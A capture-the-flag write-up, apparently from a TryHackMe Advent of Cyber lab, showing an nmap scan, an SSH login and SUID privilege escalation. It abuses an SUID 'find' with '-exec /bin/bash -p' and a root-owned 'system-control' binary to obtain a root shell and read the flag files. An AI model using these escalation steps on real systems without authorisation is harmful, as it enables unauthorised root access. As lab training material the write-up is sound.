Home

Day 08 - SUID Shenanigans

Date: 28, May, 2021

Author: Dhilip Sanjay S

Enumerating with Nmap

$ nmap -sC -sV -p- 10.10.1.202 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 00:22 IST

Nmap scan report for 10.10.1.202
Host is up (0.15s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
65534/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9e:4e:fe:71:a0:ef:83:03:00:97:4a:c6:c6:a4:0f:93 (RSA)
|   256 a7:d3:9f:bc:bf:62:d0:d3:5d:ea:cb:d3:19:08:6a:9b (ECDSA)
|_  256 ea:40:1b:27:b7:29:1a:5b:ef:f7:bd:05:b1:1d:ec:f0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 722.51 seconds

Login using SSH

  • Use the -p argument to supply the port:

$ ssh holly@10.10.1.202 -p 65534
The authenticity of host '[10.10.1.202]:65534 ([10.10.1.202]:65534)' can't be established.
ECDSA key fingerprint is SHA256:IV8SZpN7A1IoTVcTgdDaQ3Edp+lEd77QLtYYI2sesx0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.1.202]:65534' (ECDSA) to the list of known hosts.
holly@10.10.1.202's password: 
    {} _  \
        |__ \
       /_____\
       \o o)\)_______
       (<  ) /#######\
     __{'~` }#########|
    /  {   _}_/########|
   /   {  / _|#/ )####|
  /   \_~/ /_ \  |####|
  \______\/  \ | |####|
   \__________\|/#####|
    |__[X]_____/ \###/ 
    /___________\
     |    |/    |
     |___/ |___/
    _|   /_|   /
   (___,_(___,_)
Last login: Sat Dec  7 22:04:05 2019 from 10.0.0.20
holly@ip-10-10-1-202:~$ whoami
holly

What port is SSH running on?

  • Answer: 65534

Find the binaries with SUID bit set

$ find / -perm -u=s -exec ls -ldb {} \; 2>/dev/null 
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Aug 23  2019 /bin/umount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 26  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Aug 23  2019 /bin/mount
-rwsr-xr-x 1 root root 40152 May 15  2019 /snap/core/7396/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/7396/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/7396/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/7396/bin/su
-rwsr-xr-x 1 root root 27608 May 15  2019 /snap/core/7396/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/7396/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/7396/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/7396/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/7396/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7396/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7396/usr/bin/sudo
-rwsr-xr-- 1 root systemd-network 42992 Jun 10  2019 /snap/core/7396/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7396/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Jul 12  2019 /snap/core/7396/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7396/usr/sbin/pppd
-rwsrwxr-x 1 root root 8880 Dec  7  2019 /usr/bin/system-control
-rwsr-xr-x 1 igor igor 221768 Feb  7  2016 /usr/bin/find
-rwsr-xr-x 1 root root 32944 Mar 26  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 Mar 26  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 39904 Mar 26  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 Mar 26  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 71824 Mar 26  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 23376 Mar 27  2019 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at
-rwsr-xr-x 1 igor igor 2770528 Mar 31  2016 /usr/bin/nmap
-rwsr-xr-x 1 root root 75304 Mar 26  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 Mar 26  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 14864 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 84120 Apr  9  2019 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Aug 20  2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device

Find and run a file as igor. Read the file /home/igor/flag1.txt

  • Answer: THM{REDACTED}

  • Steps to Reproduce:

$ find . -exec /bin/bash -p \; -quit
$ pwd
/home/holly
$ cd ..
$ cd igor
$ ls
flag1.txt
$ cat flag1.txt
THM{REDACTED}

Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?

  • Answer: THM{REDACTED}

  • Steps to Reproduce:

bash-4.3$ /usr/bin/system-control

===== System Control Binary =====

Enter system command: whoami
root
bash-4.3$ /usr/bin/system-control

===== System Control Binary =====

Enter system command: /bin/bash -p

root@ip-10-10-1-202:/home/igor# cd /root/
root@ip-10-10-1-202:/root# ls
flag2.txt  snap

root@ip-10-10-1-202:/root# cat flag2.txt 
THM{REDACTED}
PreviousDay 07 - Skilling UpNextDay 09 - Requests

Last updated